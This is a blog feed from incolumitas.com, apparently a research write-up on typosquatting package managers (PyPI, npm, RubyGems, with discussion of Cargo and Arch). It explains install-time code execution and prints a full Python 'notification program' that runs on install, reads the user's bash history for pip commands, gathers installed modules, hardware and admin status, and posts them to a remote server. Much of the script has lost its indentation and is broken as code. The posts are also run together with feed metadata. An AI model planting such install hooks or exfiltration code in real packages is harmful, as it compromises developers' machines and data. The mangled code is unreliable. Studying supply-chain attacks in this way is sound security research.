<p><em>Packagist (PHP)</em> is not vulnerable to direct code execution upon package installation, because all installed packages are stored as dependencies in subfolders, which are never directly touched. I tried to attack <em>Packagist</em> but couldn't find any way to achieve code execution at installation time. Maybe someone familiar with the PHP ecosystem can double-check this?</p>
<h2>Discussions about potentially vulnerable package managers</h2>
<p>After I published my last blog post, several discussions emerged in package management communities about the security of their repositories in regard to the typosquatting attack.</p>
<h4>Rust (Cargo)</h4>
<p>The relatively new programming language <em>Rust</em> also has a package manager for third-party libraries, named <em>Cargo</em>, which installs packages from the crates.io repository. The publication of my blog post provoked a discussion in the <a href="https://www.reddit.com/r/rust/comments/4n5zrj/typosquatting_programming_language_package/">Rust subreddit</a>.
<a href="https://www.reddit.com/r/rust/comments/4n5zrj/typosquatting_programming_language_package/d416n75">A user</a> mentions that Cargo lets packages run arbitrary code on startup:</p>
<blockquote>
<p><strong>Cargo lets packages run arbitrary code on startup.</strong> This is pretty useful and important.
I wonder if we can use a sandbox model for this - don't let cargo scripts touch anything outside of the code directory.
Still dangerous but at least you don't have arbitrary read/write access.
I would imagine it is not idiomatic to install dependency packages for cargo scripts.</p>
</blockquote>
<p><a href="https://www.reddit.com/r/rust/comments/4n5zrj/typosquatting_programming_language_package/d416ic8">Another user</a> also confirms that <em>Cargo</em> might be affected by this vulnerability:</p>
<blockquote>
<p>This could affect crates.io (yay buildscripts!) AFAICT. However there are some important caveats with cargo.
For one thing, dependencies are added by editing a file, and CLI tools for including deps are third-party.
IME, I and others are more careful with typos in an editor than on the command line.
Further, my usual practice is to copy/paste the toml line from the crates.io page, and then remove the patch version.
But maybe that's not typical? Regardless, there's no tool for system-wide installation like pip or npm has, so it seems to me like there's
likely to be more intention behind adding a crate dependency.
Also, crates don't execute buildscripts when you add them to your Cargo.toml
(whether or not you use a tool like cargo edit), buildscripts run when you actually build your project,
so there's more chance you'll find the typo in between typing it and when malicious code could run.</p>
</blockquote>
<p>The same user also states that it doesn't seem feasible to remove the code execution on installation:</p>
<blockquote>
<p>The first doesn't seem practical because a) <strong>cargo supports arbitrary code execution in tests/benches anyways</strong> (duh) b) it'd be crappy to deprecate and c) it's really important for FFI crates and stable alternatives to compiler plugins.</p>
</blockquote>
<p>Another posted suggestion was to add an option to the package manager to allow running build scripts:</p>
<blockquote>
<p>I don't like auto-exec'ing buildscripts. But buildscripts are incredibly useful.
For cargo, we could simply stop automatically executing the buildscripts. At the same time, provide a switch called --dangerously-exec-buildscript or something else equally instructive.
Then, if I'm sure I know what I'm doing, I can do cargo install foo --dangerously-exec-buildscript</p>
</blockquote>
<p>I will examine <em>Cargo</em> more closely in a future blog post and see for myself whether it is vulnerable to typosquatting attacks.</p>
<h4>Archlinux</h4>
<p>Archlinux is actually a Linux distribution, not a programming language. There was also a <a href="https://www.reddit.com/r/archlinux/comments/4n5e6a/typosquatting_programming_language_package/">discussion</a> in the Archlinux subreddit about the security implications of letting users submit
their own packages. A user essentially confirms that Archlinux and its PKGBUILDs are affected by typosquatting by saying:</p>
<blockquote>
<p>Though package managers encourage you to read the pkgbuild and install. So if someone does read it, you can't just hide malicious install commands, you have to actually make your own github repo or something, and push malicious builds to there.</p>
</blockquote>
<h2>Package managers that will be examined more closely in upcoming blog posts</h2>
<p>I will definitely examine the following package managers more closely in the future. For <em>Nuget</em> I will need to install a Windows operating system and Visual Studio in order to test the upload
process manually. I hope that I don't need an Apple operating system when trying to attack the Swift package manager. Rust should work fine on Linux systems.</p>
<ul>
<li><a href="https://www.nuget.org/">Nuget (C#, .NET)</a></li>
<li><a href="https://github.com/rust-lang/cargo">Cargo (Rust)</a></li>
<li><a href="https://github.com/apple/swift-package-manager">apple/swift-package-manager</a></li>
</ul>Typosquatting programming language package managers2016-06-08T10:08:00+02:002016-06-08T22:11:00+02:00Nikolai Tschachertag:incolumitas.com,2016-06-08:/2016/06/08/typosquatting-package-managers/<p>Edit: It seems that the blog post and the thesis caused quite some interest. Please contact me under the following mail address: <strong>admin [|[at]|] incolumitas [[|dot|]] com</strong></p>
<p>This blog post demonstrates</p>
<ul>
<li>how <strong>17000 computers</strong> were forced to execute arbitrary code by typosquatting programming language packages/libraries</li>
<li>that <strong>50%</strong> of these installations were conducted with administrative rights</li>
<li>that even highly security-aware institutions (<strong>.gov and .mil hosts</strong>) fell victim to this attack</li>
<li>how a typosquatting attack becomes <strong>wormable</strong> by mining the <strong>command history data</strong> of hosts</li>
<li>what some good <em>defenses</em> against typosquatting package managers might look like</li>
</ul>
<p>The complete thesis <a href="https://incolumitas.com/data/thesis.pdf">can be downloaded as a PDF</a>.</p>
<p>In the second half of 2015 and the early months of 2016, I worked on my bachelor's thesis. In this thesis, I tried to attack programming language package managers such as Python's <em>PyPi</em>, Node.js's <em>npmjs.com</em> and Ruby's <em>rubygems.org</em>. The attack does not exploit a new technical vulnerability; rather, it tries to trick people into installing packages that they did not intend to run on their systems.</p>
<h3>DNS Typosquatting</h3>
<p>In the domain name system, typosquatting is a well-known problem. Typosquatting is the malicious registration of a domain that is lexically similar to another, often highly frequented, website. Typosquatters would for instance register a domain named <em>Gooogle.com</em> instead of the well-known <em>Google.com</em>. They then hope that people mistype the website name in the browser and accidentally arrive on the wrong site. The misguided traffic is often monetized either with advertisements or with malicious attacks such as drive-by downloads or exploit kits.</p>
<h3>The Idea</h3>
<p>While writing the thesis, I wondered whether the concept behind DNS typosquatting can be transferred to other use cases. Having used the programming language Python for several years, I knew that the package manager <code>pip</code> (a command line application) is used to install third-party software libraries from Python’s community repository named <code>PyPi</code>. So the natural question is: how many users make typos when issuing an installation command in the terminal with <code>pip</code>?</p>
<div class="highlight"><pre><span></span><code>sudo pip install reqeusts
</code></pre></div>
<p>Because everybody can upload any package to <code>PyPi</code>, it is possible to create packages whose names are typo versions of popular packages that are prone to be mistyped. And if somebody unintentionally installs such a package, the next question follows naturally: is it possible to run arbitrary code and take over the computer during the installation process of a package?</p>
<h3>The Attack</h3>
<p>So basically we create a fake package that has a name similar to that of a famous package on <code>PyPi</code>, <code>Npmjs.com</code> or <code>rubygems.org</code>. For example, we could upload a package named <em>reqeusts</em> instead of the famous <a href="https://pypi.python.org/pypi/requests/">requests</a> module. I created such typo package names in three different ways:</p>
<ol>
<li>
<p><strong>Creative typo names</strong> like <code>coffe-script</code> instead of <code>coffee-script</code>. Often only humans can come up with creative typo names, because creating them requires an intuitive understanding of <em>which spelling mistake is easy to make</em> with the original name.</p>
</li>
<li>
<p><strong>Stdlib typos</strong> or core package names like <code>urllib2</code>. Stdlib typos are package names that exist in the core of the language but haven't been registered in the third-party package repository yet.</p>
</li>
<li>
<p><strong>Algorithmically determined typo names</strong> like <code>req7est</code> instead of <code>request</code>. Algorithmic typo candidates are names suggested by algorithms based on measures like the Levenshtein distance.</p>
</li>
</ol>
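<p>To make the third category more concrete, here is a minimal sketch of how such candidates could be generated. It is not the generator used in the thesis; the function names <code>levenshtein</code> and <code>typo_candidates</code> and the chosen alphabet are assumptions made for illustration only.</p>

```python
import string

# Characters allowed in generated names (an assumption, not a registry rule).
ALPHABET = string.ascii_lowercase + string.digits + "-_"


def levenshtein(a, b):
    """Classic dynamic-programming edit distance between two strings."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        current = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            current.append(min(previous[j] + 1,          # deletion
                               current[j - 1] + 1,       # insertion
                               previous[j - 1] + cost))  # substitution
        previous = current
    return previous[-1]


def typo_candidates(name):
    """Names reachable from `name` by one deletion, substitution,
    insertion or swap of two adjacent characters."""
    candidates = set()
    for i in range(len(name)):
        candidates.add(name[:i] + name[i + 1:])          # deletion
        for c in ALPHABET:
            candidates.add(name[:i] + c + name[i + 1:])  # substitution
    for i in range(len(name) + 1):
        for c in ALPHABET:
            candidates.add(name[:i] + c + name[i:])      # insertion
    for i in range(len(name) - 1):
        # swap of two adjacent characters
        candidates.add(name[:i] + name[i + 1] + name[i] + name[i + 2:])
    candidates.discard(name)
    candidates.discard("")
    return candidates
```

<p>With this sketch, <code>req7est</code> is one substitution away from <code>request</code>, while the swapped letters in <code>reqeusts</code> count as two substitutions under the plain Levenshtein distance, which is why adjacent swaps are generated separately.</p>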
<p>All in all, I created <strong>over 200 such packages</strong>, equipped them with a small program and uploaded them over the course of several months. The idea is to add code to each package that is executed with the installing user's rights whenever the package is installed.</p>
<p>The following points need to be considered when attacking a package manager. The first two items of the list need to be fulfilled in order for the package repository to be vulnerable to typosquatting attacks.</p>
<ol>
<li>The possibility of registering <strong>any package name and uploading code</strong> without supervision.</li>
<li>The feasibility to <strong>achieve code execution upon package installation</strong> on the host system.</li>
<li>Accessibility and presence of good documentation for uploading and distributing packages
on the package repositories.</li>
<li>Difficulty in quickly learning the target programming language.</li>
</ol>
<p>The reader might now ask whether it is really <em>that easy for a package to execute its own code during installation</em>.</p>
<h4>Code Execution for Installed Python Packages</h4>
<p>In Python, each publicly registered package needs to have a <code>setup.py</code> file that contains package metadata such as the name, description and fixtures belonging to the package. Whenever a user installs a package from the PyPi package
repository, this <code>setup.py</code> is executed by a local Python interpreter. This means that it is possible
to hide code in the <code>setup.py</code> file that runs with the installing user's rights.</p>
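<p>The mechanism can be illustrated with a harmless sketch. This is not the <code>setup.py</code> used in the thesis; the package name <code>example-typo-package</code> and the helper <code>describe_install_context</code> are hypothetical. The sketch assumes the package is shipped as a source distribution, since prebuilt wheels are installed without running <code>setup.py</code>.</p>

```python
# setup.py -- illustrative sketch, not the file used in the thesis
import platform
import sys


def describe_install_context():
    """Collect harmless facts to show that this code runs at install time."""
    return {
        "system": platform.system(),
        "python": "{}.{}".format(*sys.version_info[:2]),
    }


# setup.py is an ordinary Python script: module-level statements like this
# one run as soon as the interpreter executes the file.
print("setup.py executed with context:", describe_install_context())

# The installer passes a command (for example `egg_info` or `install`) on the
# command line; only then is control handed over to setuptools.
if __name__ == "__main__" and sys.argv[1:]:
    from setuptools import setup
    setup(name="example-typo-package", version="0.0.1")  # hypothetical name
```

<p>Anything placed where the <code>print</code> call sits would run with the rights of whoever started the installation, which is why <code>sudo pip install</code> is particularly risky.</p>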
<h4>Code Execution for Installed NodeJS Packages</h4>
<p>NodeJS and its package manager, <code>npm</code>, provide various hooks that execute code on specific events.
Among them is a <a href="https://docs.npmjs.com/misc/scripts">preinstall option</a> that can be set in the <code>package.json</code> file, which provides options
and metadata for a published NodeJS package. It is advantageous to write this preinstall script
in JavaScript as well and to execute it with the <code>node</code> binary, because node is guaranteed to be installed on
the target system when <code>npm</code> is used to install third-party packages.</p>
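<p>As a rough sketch of what such a <code>package.json</code> could look like, the snippet below builds one in Python (used here only to keep the examples in one language). The package name and the script file <code>notify.js</code> are hypothetical; the <code>scripts.preinstall</code> key is the hook described above.</p>

```python
import json

# Hypothetical package metadata; only the "scripts" section matters here.
package = {
    "name": "example-typo-package",
    "version": "0.0.1",
    "scripts": {
        # npm runs this command before the package is installed
        "preinstall": "node notify.js",
    },
}

# Serialize to the text that would be stored as package.json
package_json = json.dumps(package, indent=2)
print(package_json)
```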
<h4>Code Execution for Installed Ruby Packages</h4>
<p>Achieving code execution with Ruby was slightly trickier. There is no official way (like in
Node.js) or easy method (like in Python’s <code>setup.py</code> file) to execute code upon installing packages
with the Ruby package manager named <code>gem</code>. However, code execution was achieved by
creating an <a href="http://blog.costan.us/2008/11/post-install-post-update-scripts-for.html">empty native Ruby extension</a> and placing the notification code in a Ruby extension configuration file named <code>extconf.rb</code>, which is interpreted during the pseudo build process.</p>
<h4>The Notification Program</h4>
<p>Now that we have achieved code execution upon installation, it is time to show the program that was executed when a user installed such a typo package. The Python script below collects some non-personal host information and sends it to a university virtual private server that had been set up beforehand. An equivalent program was developed for Ruby and NodeJS. I called this program the <em>Notification Program</em>, because it notifies me whenever a user makes a typo and installs one of my typo packages. The data collected contains the <code>IP address, the operating system, the user rights</code> and a <code>timestamp</code> of the installation.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python</span>
<span class="c1"># -*- coding: utf-8 -*-</span>
<span class="sd">"""</span>
<span class="sd">Notification program used in the typo squatting</span>
<span class="sd">bachelor thesis for the python package index.</span>
<span class="sd">Created in autumn 2015.</span>
<span class="sd">Copyright by Nikolai Tschacher</span>
<span class="sd">"""</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">ctypes</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">platform</span>
<span class="kn">import</span> <span class="nn">subprocess</span>
<span class="n">debug</span> <span class="o">=</span> <span class="kc">False</span>
<span class="c1"># we are using Python3</span>
<span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">version_info</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
    <span class="kn">import</span> <span class="nn">urllib.request</span>
    <span class="kn">from</span> <span class="nn">urllib.parse</span> <span class="kn">import</span> <span class="n">urlencode</span>
    <span class="n">GET</span> <span class="o">=</span> <span class="n">urllib</span><span class="o">.</span><span class="n">request</span><span class="o">.</span><span class="n">urlopen</span>
    <span class="k">def</span> <span class="nf">python3POST</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="p">{},</span> <span class="n">headers</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
        <span class="sd">"""</span>
<span class="sd">        Returns the response of the POST request as string or</span>
<span class="sd">        False if the resource could not be accessed.</span>
<span class="sd">        """</span>
        <span class="n">data</span> <span class="o">=</span> <span class="n">urllib</span><span class="o">.</span><span class="n">parse</span><span class="o">.</span><span class="n">urlencode</span><span class="p">(</span><span class="n">data</span><span class="p">)</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span>
        <span class="n">request</span> <span class="o">=</span> <span class="n">urllib</span><span class="o">.</span><span class="n">request</span><span class="o">.</span><span class="n">Request</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">reponse</span> <span class="o">=</span> <span class="n">urllib</span><span class="o">.</span><span class="n">request</span><span class="o">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">15</span><span class="p">)</span>
            <span class="n">cs</span> <span class="o">=</span> <span class="n">reponse</span><span class="o">.</span><span class="n">headers</span><span class="o">.</span><span class="n">get_content_charset</span><span class="p">()</span>
            <span class="k">if</span> <span class="n">cs</span><span class="p">:</span>
                <span class="k">return</span> <span class="n">reponse</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="n">cs</span><span class="p">)</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="k">return</span> <span class="n">reponse</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s1">'utf-8'</span><span class="p">)</span>
        <span class="k">except</span> <span class="n">urllib</span><span class="o">.</span><span class="n">error</span><span class="o">.</span><span class="n">HTTPError</span> <span class="k">as</span> <span class="n">he</span><span class="p">:</span>
            <span class="c1"># try again if some 400 or 500 error was received</span>
            <span class="k">return</span> <span class="s1">''</span>
        <span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
            <span class="c1"># everything else fails</span>
            <span class="k">return</span> <span class="kc">False</span>
    <span class="n">POST</span> <span class="o">=</span> <span class="n">python3POST</span>
<span class="c1"># we are using Python2</span>
<span class="k">else</span><span class="p">:</span>
    <span class="kn">import</span> <span class="nn">urllib2</span>
    <span class="kn">from</span> <span class="nn">urllib</span> <span class="kn">import</span> <span class="n">urlencode</span>
    <span class="n">GET</span> <span class="o">=</span> <span class="n">urllib2</span><span class="o">.</span><span class="n">urlopen</span>
    <span class="k">def</span> <span class="nf">python2POST</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="p">{},</span> <span class="n">headers</span><span class="o">=</span><span class="kc">None</span><span class="p">):</span>
        <span class="sd">"""</span>
<span class="sd">        See python3POST</span>
<span class="sd">        """</span>
        <span class="n">req</span> <span class="o">=</span> <span class="n">urllib2</span><span class="o">.</span><span class="n">Request</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">urlencode</span><span class="p">(</span><span class="n">data</span><span class="p">))</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">response</span> <span class="o">=</span> <span class="n">urllib2</span><span class="o">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">req</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">15</span><span class="p">)</span>
<span class="k">return</span> <span class="n">response</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="k">except</span> <span class="n">urllib2</span><span class="o">.</span><span class="n">HTTPError</span> <span class="k">as</span> <span class="n">he</span><span class="p">:</span>
<span class="k">return</span> <span class="s1">''</span>
<span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="n">POST</span> <span class="o">=</span> <span class="n">python2POST</span>
<span class="k">try</span><span class="p">:</span>
<span class="kn">from</span> <span class="nn">subprocess</span> <span class="kn">import</span> <span class="n">DEVNULL</span> <span class="c1"># py3k</span>
<span class="k">except</span> <span class="ne">ImportError</span><span class="p">:</span>
<span class="n">DEVNULL</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">devnull</span><span class="p">,</span> <span class="s1">'wb'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">get_command_history</span><span class="p">():</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'nt'</span><span class="p">:</span>
<span class="c1"># handle windows</span>
<span class="c1"># http://serverfault.com/questions/95404/</span>
<span class="c1">#is-there-a-global-persistent-cmd-history</span>
<span class="c1"># apparently, there is no history in windows :(</span>
<span class="k">return</span> <span class="s1">''</span>
<span class="k">elif</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'posix'</span><span class="p">:</span>
<span class="c1"># handle linux and mac</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="s1">'cat </span><span class="si">{}</span><span class="s1">/.bash_history | grep -E "pip[23]? install"'</span>
<span class="k">return</span> <span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="n">cmd</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">expanduser</span><span class="p">(</span><span class="s1">'~'</span><span class="p">)))</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">get_hardware_info</span><span class="p">():</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'nt'</span><span class="p">:</span>
<span class="c1"># handle windows</span>
<span class="k">return</span> <span class="n">platform</span><span class="o">.</span><span class="n">processor</span><span class="p">()</span>
<span class="k">elif</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'posix'</span><span class="p">:</span>
<span class="c1"># handle linux and mac</span>
<span class="k">if</span> <span class="n">sys</span><span class="o">.</span><span class="n">platform</span><span class="o">.</span><span class="n">startswith</span><span class="p">(</span><span class="s1">'linux'</span><span class="p">):</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">hw_info</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">(</span><span class="s1">'lshw -short'</span><span class="p">,</span>
<span class="n">stderr</span><span class="o">=</span><span class="n">DEVNULL</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
<span class="n">hw_info</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">hw_info</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">hw_info</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">(</span><span class="s1">'lspci'</span><span class="p">,</span>
<span class="n">stderr</span><span class="o">=</span><span class="n">DEVNULL</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
<span class="n">hw_info</span> <span class="o">=</span> <span class="s1">''</span>
<span class="n">hw_info</span> <span class="o">+=</span> <span class="s1">'</span><span class="se">\n</span><span class="s1">'</span> <span class="o">+</span>\
<span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="s1">'free -m'</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
<span class="k">return</span> <span class="n">hw_info</span>
<span class="k">elif</span> <span class="n">sys</span><span class="o">.</span><span class="n">platform</span> <span class="o">==</span> <span class="s1">'darwin'</span><span class="p">:</span>
<span class="c1"># According to https://developer.apple.com/library/</span>
<span class="c1"># mac/documentation/Darwin/Reference/ManPages/</span>
<span class="c1"># man8/system_profiler.8.html</span>
<span class="c1"># no personal information is provided by detailLevel: mini</span>
<span class="k">return</span> <span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="s1">'system_profiler -detailLevel mini'</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">get_all_installed_modules</span><span class="p">():</span>
<span class="c1"># first try the default path</span>
<span class="n">pip_list</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="s1">'pip list'</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span>
<span class="k">if</span> <span class="n">pip_list</span><span class="p">:</span>
<span class="k">return</span> <span class="n">pip_list</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">==</span> <span class="s1">'nt'</span><span class="p">:</span>
<span class="n">paths</span> <span class="o">=</span> <span class="p">(</span><span class="s1">'C:/Python27'</span><span class="p">,</span>
<span class="s1">'C:/Python34'</span><span class="p">,</span>
<span class="s1">'C:/Python26'</span><span class="p">,</span>
<span class="s1">'C:/Python33'</span><span class="p">,</span>
<span class="s1">'C:/Python35'</span><span class="p">,</span>
<span class="s1">'C:/Python'</span><span class="p">,</span>
<span class="s1">'C:/Python2'</span><span class="p">,</span>
<span class="s1">'C:/Python3'</span><span class="p">)</span>
<span class="c1"># try some paths that make sense to me</span>
<span class="k">for</span> <span class="n">loc</span> <span class="ow">in</span> <span class="n">paths</span><span class="p">:</span>
<span class="n">pip_location</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">loc</span><span class="p">,</span> <span class="s1">'Scripts/pip.exe'</span><span class="p">)</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="n">pip_location</span><span class="p">):</span>
<span class="n">cmd</span> <span class="o">=</span> <span class="s1">'</span><span class="si">{}</span><span class="s1"> list'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">pip_location</span><span class="p">)</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">pip_list</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">(</span><span class="n">cmd</span><span class="p">,</span>
<span class="n">stderr</span><span class="o">=</span><span class="n">DEVNULL</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
<span class="n">pip_list</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">if</span> <span class="n">pip_list</span><span class="p">:</span>
<span class="k">return</span> <span class="n">pip_list</span>
<span class="k">return</span> <span class="s1">''</span>
<span class="k">def</span> <span class="nf">notify_home</span><span class="p">(</span><span class="n">url</span><span class="p">,</span> <span class="n">package_name</span><span class="p">,</span> <span class="n">intended_package_name</span><span class="p">):</span>
<span class="n">host_os</span> <span class="o">=</span> <span class="n">platform</span><span class="o">.</span><span class="n">platform</span><span class="p">()</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">admin_rights</span> <span class="o">=</span> <span class="nb">bool</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">getuid</span><span class="p">()</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">AttributeError</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">ret</span> <span class="o">=</span> <span class="n">ctypes</span><span class="o">.</span><span class="n">windll</span><span class="o">.</span><span class="n">shell32</span><span class="o">.</span><span class="n">IsUserAnAdmin</span><span class="p">()</span>
<span class="n">admin_rights</span> <span class="o">=</span> <span class="nb">bool</span><span class="p">(</span><span class="n">ret</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span>
<span class="k">except</span><span class="p">:</span>
<span class="n">admin_rights</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">name</span> <span class="o">!=</span> <span class="s1">'nt'</span><span class="p">:</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">pip_version</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">popen</span><span class="p">(</span><span class="s1">'pip --version'</span><span class="p">)</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
<span class="k">except</span><span class="p">:</span>
<span class="n">pip_version</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">pip_version</span> <span class="o">=</span> <span class="n">platform</span><span class="o">.</span><span class="n">python_version</span><span class="p">()</span>
<span class="n">url_data</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'p1'</span><span class="p">:</span> <span class="n">package_name</span><span class="p">,</span>
<span class="s1">'p2'</span><span class="p">:</span> <span class="n">intended_package_name</span><span class="p">,</span>
<span class="s1">'p3'</span><span class="p">:</span> <span class="s1">'pip'</span><span class="p">,</span>
<span class="s1">'p4'</span><span class="p">:</span> <span class="n">host_os</span><span class="p">,</span>
<span class="s1">'p5'</span><span class="p">:</span> <span class="n">admin_rights</span><span class="p">,</span>
<span class="s1">'p6'</span><span class="p">:</span> <span class="n">pip_version</span><span class="p">,</span>
<span class="p">}</span>
<span class="n">post_data</span> <span class="o">=</span> <span class="p">{</span>
<span class="s1">'p7'</span><span class="p">:</span> <span class="n">get_command_history</span><span class="p">(),</span>
<span class="s1">'p8'</span><span class="p">:</span> <span class="n">get_all_installed_modules</span><span class="p">(),</span>
<span class="s1">'p9'</span><span class="p">:</span> <span class="n">get_hardware_info</span><span class="p">(),</span>
<span class="p">}</span>
<span class="n">url_data</span> <span class="o">=</span> <span class="n">urlencode</span><span class="p">(</span><span class="n">url_data</span><span class="p">)</span>
<span class="n">response</span> <span class="o">=</span> <span class="n">POST</span><span class="p">(</span><span class="n">url</span> <span class="o">+</span> <span class="n">url_data</span><span class="p">,</span> <span class="n">post_data</span><span class="p">)</span>
<span class="k">if</span> <span class="n">debug</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">response</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">''</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Warning!!! Maybe you made a typo in your installation</span><span class="se">\</span>
<span class="s2"> command or the module does only exist in the python stdlib?!"</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Did you want to install '</span><span class="si">{}</span><span class="s2">'</span><span class="se">\</span>
<span class="s2"> instead of '</span><span class="si">{}</span><span class="s2">'??!"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">intended_package_name</span><span class="p">,</span> <span class="n">package_name</span><span class="p">))</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'For more information, please</span><span class="se">\</span>
<span class="s1"> visit http://svs-repo.informatik.uni-hamburg.de/'</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="k">if</span> <span class="n">debug</span><span class="p">:</span>
<span class="n">notify_home</span><span class="p">(</span><span class="s1">'http://localhost:8000/app/?'</span><span class="p">,</span>
<span class="s1">'pmba_basic'</span><span class="p">,</span> <span class="s1">'pmba_basic'</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">notify_home</span><span class="p">(</span><span class="s1">'http://svs-repo.informatik.uni-hamburg.de/app/?'</span><span class="p">,</span>
<span class="s1">'pmba_basic'</span><span class="p">,</span> <span class="s1">'pmba_basic'</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>
<h3>Results</h3>
<p>In two empirical phases, exactly <strong>45334 HTTP requests</strong> from <strong>17289 unique hosts</strong> (distinct
IP addresses) were gathered. This means that 17289 distinct hosts executed the program above and sent the data to the web server, where it was analyzed for the thesis. For various reasons, the number of HTTP requests is higher than the number of distinct IP addresses. The main reason is that <code>pip</code> executes the <code>setup.py</code> file twice on installation. Don't ask me why.</p>
